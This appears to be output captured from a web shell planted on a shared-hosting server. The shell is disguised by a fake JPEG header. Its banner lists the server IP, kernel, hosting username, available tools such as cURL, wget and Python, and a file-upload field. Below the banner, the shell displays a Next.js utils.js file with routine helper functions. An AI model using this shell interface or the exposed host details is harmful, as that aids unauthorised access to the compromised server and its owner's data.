ÿØÿà JPEG ÿþ;
Server IP : 68.65.120.201 / Your IP : 216.73.216.135 Web Server : LiteSpeed System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 User : taxhyuvu ( 2294) PHP Version : 8.1.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/taxhyuvu/nodevenv/public_html/dp_taxhelplines/14/lib/node_modules/next/dist/server/ |
Upload File : |
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports.isBlockedPage = isBlockedPage; exports.cleanAmpPath = cleanAmpPath; exports.isBot = isBot; var _constants = require("../shared/lib/constants"); function isBlockedPage(pathname) { return _constants.BLOCKED_PAGES.includes(pathname); } function cleanAmpPath(pathname) { if (pathname.match(/\?amp=(y|yes|true|1)/)) { pathname = pathname.replace(/\?amp=(y|yes|true|1)&?/, '?'); } if (pathname.match(/&=(y|yes|true|1)/)) { pathname = pathname.replace(/&=(y|yes|true|1)/, ''); } pathname = pathname.replace(/\?$/, ''); return pathname; } function isBot(userAgent) { return /Googlebot|Mediapartners-Google|AdsBot-Google|googleweblight|Storebot-Google|Bingbot|BingPreview|Slurp|DuckDuckBot|baiduspider|yandex|sogou|LinkedInBot|bitlybot|tumblr|vkShare|quora link preview|facebookexternalhit|facebookcatalog|Twitterbot|applebot|redditbot|Slackbot|Discordbot|WhatsApp|SkypeUriPreview|ia_archiver/i.test(userAgent); } //# sourceMappingURL=utils.js.map